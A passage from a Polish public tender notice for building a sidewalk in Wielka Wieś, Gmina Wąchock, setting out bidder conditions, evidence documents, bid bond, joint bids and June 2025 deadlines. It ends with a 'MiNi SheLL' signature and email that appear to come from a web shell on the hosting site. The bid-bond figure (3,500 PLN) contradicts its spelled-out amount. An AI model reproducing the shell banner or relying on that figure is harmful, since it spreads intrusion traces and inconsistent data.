postępowaniu.<br/>Udział w postępowaniu mogą wziąć jedynie Wykonawcy, którzy:<br/>1)	nie podlegają wykluczeniu z postępowania – podstawy wykluczenia opisano <br/>w rozdziałach VIII – XI niniejszej SWZ;<br/>2)	spełniają warunek, o którym mowa w art. 113 w zw. z art. 266 PZP, tj. warunek dotyczący zdolności do występowania w obrocie gospodarczym;<br/>3)	spełniają warunki, o których mowa w art. 116 ust. 1 w zw. z art. 266 PZP, tj. warunki dotyczące niezbędnego wykształcenia, kwalifikacji zawodowych, doświadczenia, potencjału technicznego wykonawcy lub osób skierowanych przez wykonawcę do realizacji zamówienia, umożliwiające realizację zamówienia na odpowiednim poziomie jakości.<br/>W zakresie warunku, o którym mowa w art. 113 w zw. z art. 266 PZP: Zamawiający wymaga, aby Wykonawcy prowadzący działalność gospodarczą lub zawodową byli wpisani do jednego <br/>z rejestrów zawodowych lub handlowych prowadzonych w kraju, w którym mają siedzibę lub miejsce zamieszkania.<br/>W zakresie warunków, o których mowa w art. 116 ust. 1 w zw. z art. 266 PZP Zamawiający wymaga, aby:<br/>1)	w zakresie doświadczenia: wymagane jest wykazanie wykonanych nie wcześniej niż <br/>w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej dwóch robót budowlanych <br/>o wartości przynajmniej 200.000,00 zł brutto (słownie: dwieście tysięcy złotych 00/100) każda, polegających na budowie/przebudowie/remoncie chodnika, nawierzchni z kostki betonowej wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. Dowody na spełnienie warunku określono w rozdziale XXV Specyfikacji Warunków Zamówienia (SWZ).<br/>W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymieniony warunek mogą spełniać łącznie. <br/>Dla ww. wartości wykazanych przez Wykonawcę w walucie innej niż PLN, Zamawiający przyjmie przelicznik według średniego kursu NBP z dnia opublikowania ogłoszenia <br/>o zamówieniu w Biuletynie Zamówień Publicznych.<br/>2)	w zakresie kwalifikacji zawodowych: Zamawiający wymaga aby Wykonawca dysponował przynajmniej jedną osobą posiadającą uprawnienia do kierowania robotami drogowymi – kierownikiem budowy. <br/>Wskazane powyżej uprawnienia budowlane muszą być zgodne z ustawą dnia 7 lipca 1994 r. – Prawo budowlane (t.j. Dz. U. z 2024 r., poz. 725 z późn. zm.) oraz rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie <br/>(Dz. U. z 2019 r., poz. 831 z późn. zm.) lub odpowiadającym im ważnym uprawnieniom budowlanym, wydanym na podstawie uprzednio obowiązujących przepisów prawa lub odpowiednich przepisów obowiązujących na terenie kraju, z którego pochodzi dana osoba, które w zakresie objętym zamówieniem pozwalać będą na pełnienie samodzielnych funkcji technicznych w budownictwie w ww. specjalności.<br/>W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymieniony warunek musi spełnić co najmniej jeden z Wykonawców. Dowody na spełnienie warunku określono w rozdziale XXV Specyfikacji Warunków Zamówienia (SWZ).<br/>W pozostałym zakresie zgodnie z SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">3.	Zgodnie z art. 274 ust. 1 PZP: Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia nw. podmiotowych środków dowodowych oraz innych dokumentów:<br/>b.	dokumenty potwierdzające brak podstaw do wykluczenia:<br/>i.	odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji <br/>i Informacji o Działalności Gospodarczej sporządzonych nie wcześniej <br/>niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu lub rejestru do ewidencji – w celu potwierdzenia, że osoba działająca <br/>w imieniu Wykonawcy jest umocowana do jego reprezentowania;<br/>ii.	oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5) ustawy Pzp <br/>o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. <br/>z 2020 r. poz. 1076 i 1086) z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału <br/>w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 8 do Specyfikacji Warunków Zamówienia (SWZ);<br/>W pozostałym zakresie zgodnie z SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">3.	Zgodnie z art. 274 ust. 1 PZP: Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia nw. podmiotowych środków dowodowych oraz innych dokumentów:<br/>a.	dokumenty potwierdzające spełnianie warunków udziału w postępowaniu: <br/>w celu potwierdzenia spełniania warunków, o którym mowa w rozdziale VII <br/>pkt A akapit pierwszy ppkt 2) oraz 3) Specyfikacji Warunków Zamówienia (SWZ) Wykonawca złoży: <br/>i.	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;<br/>ii.	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia <br/>i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami<br/>– zgodnie z załącznikiem nr 7 do Specyfikacji Warunków Zamówienia (SWZ); <br/>W pozostałym zakresie zgodnie z SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zgodnie z SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zgodnie z art. 97 ust. 1 w zw. z art. 266 PZP Zamawiający wymaga wniesienia wadium. Jeżeli Zamawiający określił, że wymaga wniesienia wadium obowiązują poniższe postanowienia niniejszego rozdziału oraz inne, odnoszące się do wadium.<br/>2.	Wykonawca przystępujący do postępowania jest obowiązany do wniesienia kwoty wadium w wysokości 3.500,00 PLN (słownie: pięć tysięcy złotych 00/100). Kwota wadium obliczona zgodnie z art. 281 ust. 4 PZP.<br/>3.	Zgodnie z art. 97 ust. 5 w zw. z art. 266 PZP: Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, <br/>z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2.<br/>4.	Zgodnie z art. 97 ust. 7 w zw. z art. 266 PZP: Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach: <br/>a.	pieniądzu; <br/>b.	gwarancjach bankowych; <br/>c.	gwarancjach ubezpieczeniowych; <br/>d.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2) ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2024 r. poz. 419).<br/>5.	Zgodnie z art. 97 ust. 8 w zw. z art. 266 PZP: Wadium wnoszone w pieniądzu Wykonawca wpłaca na rachunek bankowy Zamawiającego prowadzony w Banku Spółdzielczym <br/>w Wąchocku o nr: 85 8523 0004 0000 0039 2000 0006. Tytuł przelewu: „Budowa chodnika od nr 342 do WDK w Wielkiej Wsi, Gmina Wąchock” – wadium. Wadium wnoszone w pieniądzu wpłaca się z takim wyprzedzeniem, aby wpłynęło na rachunek Zamawiającego przed upływem terminu składania ofert. Wniesienie wadium przelewem oznacza uznanie kwoty wadium przez rachunek Zamawiającego.<br/>W pozostałym zakresie zgodnie z SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> B.	Wspólne ubieganie się o udzielenie zamówienia.<br/>Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Na podstawie art. 58 ust. 5 w zw. z art. 266 PZP: Podstawy dotyczące wykluczenia wskazane <br/>w Specyfikacji Warunków Zamówienia (SWZ) każdy z Wykonawców musi wykazać odrębnie <br/>w składanej ofercie (dotyczy oświadczeń i deklaracji), czy w trakcie procedury badania i oceny ofert.<br/>Warunki udziału w postępowaniu zostały opisane w części Specyfikacji Warunków Zamówienia (SWZ) odnoszącej się do wymaganych warunków udziału.<br/>Zamawiający dokona oceny wstępnej spełniania tych warunków na podstawie:<br/>Warunek udziału	Dokument potwierdzający spełnianie warunku udziału<br/>Podstawy wykluczenia, o których mowa w art. 108 <br/>ust. 1 w zw. z art. 266 PZP	Oświadczenie Wykonawcy, Wykonawcy wspólnie ubiegającego się (ustawowe podstawy wykluczenia) – załącznik nr 3 <br/>Podstawa wykluczenia, o której mowa w art. 110 <br/>ust. 3 w zw. z art. 266 PZP	Oświadczenie Wykonawcy, Wykonawcy wspólnie ubiegającego się (ustawowe podstawy wykluczenia) – załącznik nr 3<br/>Sankcyjne podstawy wykluczenia	Oświadczenie Wykonawcy, Wykonawcy wspólnie ubiegającego się (ustawowe podstawy wykluczenia) – załącznik nr 3<br/>Podstawy wykluczenia, o których mowa w art. 109<br/> ust. 1 w zw. z art. 266 PZP	Oświadczenie Wykonawcy, Wykonawcy wspólnie ubiegającego się (ustawowe podstawy wykluczenia) – załącznik nr 3 <br/>Warunki udziału określone w art. 113 w zw. z art. 266 PZP	Oświadczenie Wykonawcy, Wykonawcy wspólnie ubiegającego się (warunki udziału w postępowaniu) – załącznik nr 4 <br/>Warunki udziału określone w art. 116 ust. 1 w zw. <br/>z art. 266 PZP	Formularz dot. zdolności technicznej lub zawodowej – załącznik nr 7<br/>Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców (art. 59 w zw. z art. 266 PZP). <br/>Wykonawcy składający ofertę wspólną mają obowiązek w załączniku nr 1 do Specyfikacji Warunków Zamówienia (SWZ) określić, że wspólnie wykonują zamówienie i wypełnić załącznik nr 5 do Specyfikacji Warunków Zamówienia (SWZ).<br/>Zasady składania ofert wspólnych uregulowane są ponadto w rozdziałach XV, XXII, XXV oraz XXXIX niniejszej SWZ.<br/>W pozostałym zakresie zgodnie z SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia został przewidziany w załączniku nr 9 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-06 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://wachock.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-06 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-04</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com